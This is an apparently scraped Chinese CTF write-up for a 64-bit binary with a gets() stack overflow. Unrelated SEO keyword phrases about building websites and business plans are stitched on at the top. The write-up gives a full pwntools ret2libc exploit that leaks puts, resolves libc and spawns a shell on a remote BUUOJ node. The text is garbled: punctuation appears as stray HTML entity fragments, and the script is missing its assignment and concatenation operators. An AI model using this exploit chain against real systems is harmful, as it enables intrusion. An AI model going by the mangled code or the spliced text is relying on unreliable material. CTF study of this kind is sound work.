好的网站制作注册了域名怎么做网站

好的网站制作,注册了域名怎么做网站,贸易网站源码,大学生创业计划书首先checksec检查保护机制#xff1a;-64位程序-开启了栈不可执行保护接下来使用IDA反汇编工具进行分析#xff1a;发现begin函数#xff0c;点进去begin函数内部#xff1a;输入1可用进入encrypt函数#xff0c;输入2可从主函数看到并没有什么用#xff0c;3是退出程序这…首先checksec检查保护机制-64位程序-开启了栈不可执行保护接下来使用IDA反汇编工具进行分析发现begin函数点进去begin函数内部输入1可用进入encrypt函数输入2可从主函数看到并没有什么用3是退出程序这是encrypt函数内部get函数可触发栈溢出漏洞看到这一行代码就可用了下面的加密过程对破解程序无任何帮助。顺便算出s到栈底的偏移0x500x8 0x58由于在IDA中没发现任何后门函数和system函数地址所以这里考虑泄露libc后来得到system函数和/bin/sh这里我们需要构造ROP链来调用函数所以还需用到ret和rdi的地址输入以下指令ROPgadget --binary pwn --only pop|retrdi地址0x400c83ret地址0x4006b9q其中rdi用于调用函数ret用于栈对齐再在IDA中拿到encrypt地址用于第一次泄露libc后再次进入encrypt函数0x4009A0基本信息拿到可用来写exp攻击脚本了from pwn import * from LibcSearcher import LibcSearcher context(archamd64, oslinux, log_leveldebug) #io process(./pwn) # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io connect(node5.buuoj.cn,28902) # 与在线环境交互。 encrypt_addr 0x4009A0 offset 0x58 elf ELF(./pwn) puts_got elf.got[puts] puts_plt elf.plt[puts] rdi_addr 0x400c83 ret_addr 0x4006b9 io.recvuntil(bInput your choice!\n) io.sendline(b1) io.recvuntil(bInput your Plaintext to be encrypted\n) payload ba*offset p64(rdi_addr) p64(puts_got) p64(puts_plt) p64(encrypt_addr) io.sendline(payload) io.recvline() io.recvline() puts_addr u64(io.recvline().strip().ljust(8,b\x00)) print(hex(puts_addr)) libc LibcSearcher(puts,puts_addr) libc_base puts_addr - libc.dump(puts) system_addr libc_base libc.dump(system) bin_sh_addr libc_base libc.dump(str_bin_sh) io.recvuntil(bInput your Plaintext to be encrypted\n) payload ba*offset p64(ret_addr) p64(rdi_addr) p64(bin_sh_addr) p64(system_addr) io.sendline(payload) io.interactive()这是运行结果这里需要手动选择libc64位程序就选64位的libc可能会选到不适配的libc库多试几次就可用了拿到shell后手动输入cat flag拿到flag